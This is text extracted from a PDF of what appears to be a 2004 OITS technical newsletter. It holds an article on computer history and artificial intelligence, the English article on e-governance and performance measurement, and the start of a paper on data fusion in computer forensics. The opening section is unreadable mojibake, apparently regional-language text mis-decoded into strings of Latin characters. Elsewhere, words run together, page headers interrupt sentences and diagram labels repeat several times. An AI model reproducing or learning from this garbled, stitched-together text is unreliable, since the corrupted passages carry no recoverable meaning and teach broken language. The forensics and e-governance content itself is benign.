j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 14: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

